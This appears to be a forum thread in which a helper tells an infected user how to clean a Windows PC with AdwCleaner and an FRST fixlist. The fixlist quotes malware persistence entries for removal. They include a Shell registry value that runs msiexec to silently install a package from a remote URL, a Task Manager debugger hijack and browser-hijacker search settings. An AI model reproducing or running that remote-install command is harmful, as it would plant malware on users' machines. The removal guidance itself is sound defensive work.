Hello, here are the FRST logs:
frst:
http://www.wklej.org/id/3103636/
addition:
http://www.wklej.org/id/3103638/
shortcut:
http://www.wklej.org/id/3103640/
In Control Panel, uninstall AlphaGo and Browser-Security.
Download and run AdwCleaner. Click Scan and then Clean.
Click Scan and post the new FRST and Addition reports.
Paste the following into Notepad and save it as a text file named fixlist:
CloseProcesses:
HKU\S-1-5-21-887313937-3397365559-1128996302-1001\...\Run: [background_fault] => C:\Users\ja\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) <===== UWAGA
HKU\S-1-5-21-887313937-3397365559-1128996302-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8xRWq1OUUyRYIcRWLXNWZLMdQQFdI5OYZXM8JWFdH8RF== /q
IFEO\taskmgr.exe: [Debugger]
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-887313937-3397365559-1128996302-1001\Software\Microsoft\Internet Explorer\Main,Start Page =
Edge HomeButtonPage: HKU\S-1-5-21-887313937-3397365559-1128996302-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=1492593644&z=a0febc485133fce1163800agez6t9o8w0t1ccq8z0w&from=che0812&uid=ST1000LM014-SSHD-8GB_W380X8RFXXXXW380X8RF
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\p2l1nwt1.default -> luck
FF SearchEngineOrder.1: Mozilla\Firefox\Profiles\p2l1nwt1.default -> luck
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\p2l1nwt1.default -> luck
CHR StartupUrls: Default -> "hxxps://fantasy.premierleague.com/a/team/78553/event/34","hxxp://www.fplstatistics.co.uk/","hxxps://fpldiscovery.wordpress.com/category/regular-posts/gameweek-statistics/","hxxps://www.whoscored.com/Regions/252/Tournaments/2/England-Premier-League"
CHR DefaultSearchURL: Default -> hxxp://www.ourluckysites.com/search/?type=ds&ts=1492593644&z=a0febc485133fce1163800agez6t9o8w0t1ccq8z0w&from=che0812&uid=ST1000LM014-SSHD-8GB_W380X8RFXXXXW380X8RF&q={searchTerms}
CHR DefaultSearchKeyword: Default -> ourluckysites
CHR Extension: (Browser-Security) - C:\Users\ja\AppData\Local\Google\Chrome\User Data\Default\Extensions\faeinneekbeceimjnljfmaincojhhmln [2016-10-26]
CHR HKLM-x32\...\Chrome\Extension: [ofoeigeaodhbjogdigckajfhjbonaofg] - hxxps://clients2.google.com/service/update2/crx
R2 SNAREA; C:\Users\ja\AppData\Local\SNAREA\Snare.dll [826368 2017-05-03] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego]
R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
S2 3DM; C:\Users\ja\AppData\Local\3DM\Kitty.dll [X]
S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X]
S2 Service KMSELDI; C:\Program Files\KMSpico\Service_KMS.exe [X]
2017-05-04 10:56 - 2017-05-04 10:56 - 00000000 _____ C:\Users\Public\Documents\temp.dat
2017-05-04 10:55 - 2017-05-04 10:55 - 00000000 ____D C:\ProgramData\SWCUTemp
2017-05-04 10:43 - 2017-05-04 10:51 - 00000000 ____D C:\AdwCleaner
2017-05-04 10:41 - 2017-05-04 10:42 - 00000000 ____D C:\Users\ja\AppData\Local\background_fault
2017-05-03 20:44 - 2017-05-03 20:44 - 00000000 ____D C:\Users\Public\Documents\Google
2017-05-03 20:44 - 2017-05-03 20:44 - 00000000 ____D C:\Users\ja\AppData\Local\Dayglad
2017-05-03 20:44 - 2017-05-03 20:44 - 00000000 ____D C:\Program Files (x86)\IIS
2017-05-03 20:44 - 2017-05-03 20:44 - 00000000 ____D C:\Program Files (x86)\Dayglad
2017-05-03 20:41 - 2017-05-03 20:41 - 00000000 ____D C:\WINDOWS\psgo
2017-05-03 20:41 - 2017-05-03 20:41 - 00000000 ____D C:\Users\ja\AppData\Local\SNAREA
2017-05-03 20:41 - 2017-05-03 20:41 - 00000000 _____ C:\WINDOWS\SysWOW64\1111111
2017-05-03 20:39 - 2017-05-03 20:41 - 00000000 ____D C:\Program Files\MK
2017-05-02 18:56 - 2017-05-02 18:56 - 00000000 ____D C:\Program Files (x86)\MIO
2017-04-13 15:01 - 2017-03-08 12:03 - 00000000 ____D C:\Users\ja\AppData\Roaming\ScreenShot
C:\Users\ja\AppData\Local\background_fault\aswRD.exe
Task: {0647C3B1-DEEF-456F-8FB8-E4BEA612BAB0} - System32\Tasks\AutoPico Daily Restart => C:\Program Files\KMSpico\AutoPico.exe
Task: {45DF0865-7A1C-4481-A603-85419C762382} - System32\Tasks\klcp_update => C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe [2016-10-10] ()
Shortcut: C:\Users\ja\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Dayglad\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\ja\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Dayglad\Application\chrome.exe (Google Inc.)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Dayglad\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Dayglad\Application\chrome.exe (Google Inc.)
FirewallRules: [{60C3CD68-ADA8-442D-A6AA-DBFC11D1B1A1}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000lm014-sshd-8gb_w380x8rfxxxxw380x8rf.dat
FirewallRules: [{2D6EC592-08E9-4977-89A5-7FA885D3F54D}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000lm014-sshd-8gb_w380x8rfxxxxw380x8rf.dat
FirewallRules: [{713D1B58-A519-4121-A4DC-2812F8083F37}] => (Allow) C:\Program Files (x86)\Dayglad\Application\chrome.exe
FirewallRules: [{2B8DD5E2-A39F-42CA-B5C2-F9242FBEA33B}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{C857B866-C6A7-47F2-B216-F7B99BFACB00}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
FirewallRules: [{0872D2DD-B5DD-413F-9202-134DDB4CF206}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000lm014-sshd-8gb_w380x8rfxxxxw380x8rf.dat
FirewallRules: [{2FFB0798-947D-4871-BC66-6F3AB329AA4C}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000lm014-sshd-8gb_w380x8rfxxxxw380x8rf.dat
EmptyTemp:
Run FRST and click Fix. Post the Fixlog removal report.
Click Scan and post the new FRST report, without Addition and Shortcut.
Resetting Chrome to default settings
In the address bar, type: about:support. Click Refresh Firefox.
Install uBlock: Firefox - Chrome - Opera
Paste the following into Notepad and save it as a text file named fixlist:
S2 IISvr; C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\te\msdeploy.resources.dll [X]
2017-05-04 13:13 - 2017-05-04 13:13 - 00000000 ____D C:\ProgramData\SWCUTemp
2017-05-04 13:09 - 2017-02-09 00:29 - 00000000 ____D C:\Users\ja\AppData\LocalLow\Temp
DeleteQuarantine:
Run FRST and click Fix. Afterwards, delete the C:\FRST folder.
Read about how programs should be installed: CLICK - CLICK - CLICK
Uninstall Java 8 Update 121 and install Java 8 Update 131.
Turn on System Restore for the system drive C:
https://www.tenforums.com/tutorials/4533-turn-off-system-protection-drives-windows-10-a.html